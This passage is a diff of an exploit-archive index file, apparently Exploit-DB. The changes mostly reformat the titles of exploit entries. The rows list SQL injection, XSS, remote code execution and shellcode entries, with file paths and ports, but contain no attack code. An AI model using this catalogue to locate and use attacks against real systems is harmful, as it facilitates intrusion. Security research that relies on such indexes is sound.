POST/PUT Requests HTTP Header Processing Denial Of Service",2011-10-01,"Usman Saeed",multiple,dos,0 36199,platforms/linux/remote/36199.txt,"Perl 5.x Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote,0 -36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 -36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 +36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 +36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0Day)",2015-03-01,"OJ Reeves",hardware,webapps,80 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465 36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0 -36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 +36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0 -36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443 +36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 -36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 +36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 -36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 -36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0 +36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0 +36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0 36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 Multiple Remote File Include Vulnerabilities",2011-10-10,indoushka,php,webapps,0 36217,platforms/windows/remote/36217.txt,"GoAhead Webserver 2.18 addgroup.asp group Parameter XSS",2011-10-10,"Silent Dream",windows,remote,0 @@ -32658,7 +32658,7 @@ id,file,description,date,author,platform,type,port 36220,platforms/php/webapps/36220.txt,"Joomla! 'com_tree' Component 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36221,platforms/php/webapps/36221.txt,"Joomla! 'com_br' Component 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 36222,platforms/php/webapps/36222.txt,"Joomla! 'com_shop' Component 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0 -36223,platforms/php/webapps/36223.txt,"2Moons 1.4 Multiple Remote File Include Vulnerabilities",2011-10-11,indoushka,php,webapps,0 +36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Include Vulnerabilities",2011-10-11,indoushka,php,webapps,0 36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 36225,platforms/php/webapps/36225.txt,"Contao CMS 2.10.1 Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0 36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 @@ -32667,12 +32667,12 @@ id,file,description,date,author,platform,type,port 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0 36230,platforms/php/webapps/36230.txt,"Calculated Fields Form WordPress Plugin <= 1.0.10 - Remote SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Shell Upload",2015-02-28,R-73eN,php,webapps,0 -36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 +36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 - Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow and Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0 36235,platforms/windows/remote/36235.txt,"PROMOTIC 8.1.3 Multiple Security Vulnerabilities",2011-10-14,"Luigi Auriemma",windows,remote,0 36236,platforms/php/webapps/36236.txt,"Xenon 'id' Parameter Multiple SQL Injection Vulnerabilities",2011-10-14,m3rciL3Ss,php,webapps,0 -36237,platforms/php/webapps/36237.txt,"asgbookphp 1.9 'index.php' Cross Site Scripting",2011-10-17,indoushka,php,webapps,0 +36237,platforms/php/webapps/36237.txt,"asgbookphp 1.9 - 'index.php' Cross Site Scripting",2011-10-17,indoushka,php,webapps,0 36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass",2011-10-17,"Deral Heiland PercX",multiple,remote,0 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0 @@ -32683,24 +32683,24 @@ id,file,description,date,author,platform,type,port 36247,platforms/multiple/dos/36247.txt,"Splunk <= 4.1.6 Web component Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 36248,platforms/php/webapps/36248.txt,"osCommerce Remote File Upload and File Disclosure Vulnerabilities",2011-10-20,indoushka,php,webapps,0 36249,platforms/php/webapps/36249.txt,"Tine 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0 -36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0 +36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0 36251,platforms/php/webapps/36251.txt,"PHPMoAdmin Unauthorized Remote Code Execution (0-Day)",2015-03-03,@u0x,php,webapps,80 -36252,platforms/php/webapps/36252.txt,"e107 0.7.24 'cmd' Parameter Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps,0 +36252,platforms/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Parameter Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps,0 36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0 36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 Multiple Local File Include Vulnerabilities",2011-10-25,"Null H4ck3r",php,webapps,0 -36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 +36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 - Local Privilege Escalation",2011-10-26,"Buguroo Offensive Security",linux,local,0 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection Vulnerabilities",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos,0 -36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,metasploit,php,remote,80 +36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,Metasploit,php,remote,80 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 36266,platforms/lin_x86-64/dos/36266.c,"Linux Kernel <= 3.17.5 - IRET Instruction #SS Fault Handling Crash PoC",2015-03-04,"Emeric Nasi",lin_x86-64,dos,0 36267,platforms/linux/dos/36267.c,"Linux Kernel <= 3.15.6 - PPP-over-L2TP Socket Level Handling Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 36268,platforms/linux/dos/36268.c,"Linux Kernel <= 3.16.3 - Associative Array Garbage Collection Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 -36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 -36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 'p48-search.html' Cross Site Scripting",2011-10-28,"599eme Man",php,webapps,0 +36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 +36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross Site Scripting",2011-10-28,"599eme Man",php,webapps,0 36271,platforms/osx/dos/36271.py,"Apple Mac OS X <= 10.6.5 And iOS <= 4.3.3 Mail Denial of Service",2011-10-29,shebang42,osx,dos,0 36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Include Vulnerabilities",2011-11-01,indoushka,php,webapps,0 @@ -32720,20 +32720,20 @@ id,file,description,date,author,platform,type,port 36288,platforms/multiple/dos/36288.php,"Multiple Vendors libc 'regcomp()' Stack Exhaustion Denial Of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0 -36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 +36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal",2011-11-07,Buherátor,java,webapps,0 -36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution",2011-11-04,"Christophe de la Fuente",php,webapps,0 +36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 - 'command_name' Parameter Remote Command Execution",2011-11-04,"Christophe de la Fuente",php,webapps,0 36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0 36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,php,webapps,0 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Local Privilege Escalation",2011-11-09,IKCE,bsd,local,0 36297,platforms/php/webapps/36297.txt,"AShop Open-Redirection and Cross Site Scripting Vulnerabilities",2011-11-09,"Infoserve Security Team",php,webapps,0 -36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 +36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI <= 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80 -36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555 +36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,Metasploit,windows,remote,5555 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0 36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0 @@ -32746,7 +32746,7 @@ id,file,description,date,author,platform,type,port 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting",2011-11-17,"James webb",php,webapps,0 36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross Site Scripting",2011-11-17,Am!r,php,webapps,0 36318,platforms/windows/remote/36318.txt,"Jetty Web Server Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 -36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 +36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 36320,platforms/php/webapps/36320.txt,"Codoforum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 36321,platforms/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,php,webapps,80 36322,platforms/php/webapps/36322.txt,"Digital Attic Foundation CMS 'id' Parameter SQL Injection",2011-11-20,tempe_mendoan,php,webapps,0 @@ -32766,21 +32766,21 @@ id,file,description,date,author,platform,type,port 36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting",2011-11-23,Amir,php,webapps,0 -36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting",2011-11-23,Amir,php,webapps,0 -36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting",2011-11-23,Amir,php,webapps,0 +36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross Site Scripting",2011-11-23,Amir,php,webapps,0 +36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross Site Scripting",2011-11-23,Amir,php,webapps,0 36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 -36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0 -36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 -36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,php,webapps,0 +36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0 +36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 +36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 - 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,php,webapps,0 36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0 -36347,platforms/php/webapps/36347.txt,"Hastymail2 'rs' Parameter Cross Site Scripting",2011-11-22,HTrovao,php,webapps,0 +36347,platforms/php/webapps/36347.txt,"Hastymail2 - 'rs' Parameter Cross Site Scripting",2011-11-22,HTrovao,php,webapps,0 36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 SQL Injection",2011-11-23,anonymous,php,webapps,0 36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 -36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x 'mod_proxy' Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0 +36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x - 'mod_proxy' Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0 36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager i 9.10 nnm/mibdiscover node Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager i 9.10 nnm/protected/configurationpoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager i 9.10 nnm/protected/ping.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 @@ -32788,14 +32788,14 @@ id,file,description,date,author,platform,type,port 36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 nnm/protected/traceroute.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - CSRF",2015-03-11,"Luis Santana",php,webapps,0 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 -36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,metasploit,windows,remote,0 +36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,Metasploit,windows,remote,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service",2011-11-25,"Houssam Sahli",windows,dos,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin 'idnews' Parameter Cross Site Scripting",2011-11-28,Amir,php,webapps,0 36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 -36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 -36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Stored XSS",2015-03-13,"ITAS Team",php,webapps,0 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass Via HTTP Header Pollution",2015-03-12,"BGA Security",xml,webapps,0 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0 @@ -32812,7 +32812,7 @@ id,file,description,date,author,platform,type,port 36381,platforms/php/webapps/36381.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting",2011-11-30,Am!r,php,webapps,0 36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting",2011-11-30,Am!r,php,webapps,0 -36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 'index.php' Multiple SQL Injection Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Auth Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 36405,platforms/windows/dos/36405.txt,"Serv-U 11.1.0.3 - Denial of Service and Security Bypass Vulnerabilities",2011-12-05,"Luigi Auriemma",windows,dos,0 @@ -32828,28 +32828,28 @@ id,file,description,date,author,platform,type,port 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shel shellcode l (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 -36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting",2011-12-06,Am!r,php,webapps,0 +36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 -36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0 +36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,Metasploit,windows,remote,0 36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 -36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 -36402,platforms/asp/webapps/36402.txt,"Hero 3.69 'month' Parameter Cross Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 +36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 +36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",windows,dos,0 36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos,0 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 -36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200 -36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting",2012-01-01,Net.Edit0r,php,webapps,0 -36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 -36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps,0 -36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 'windowed' Parameter Cross Site Scripting",2012-01-02,sonyy,php,webapps,0 +36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,Metasploit,java,remote,9200 +36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Parameter Cross Site 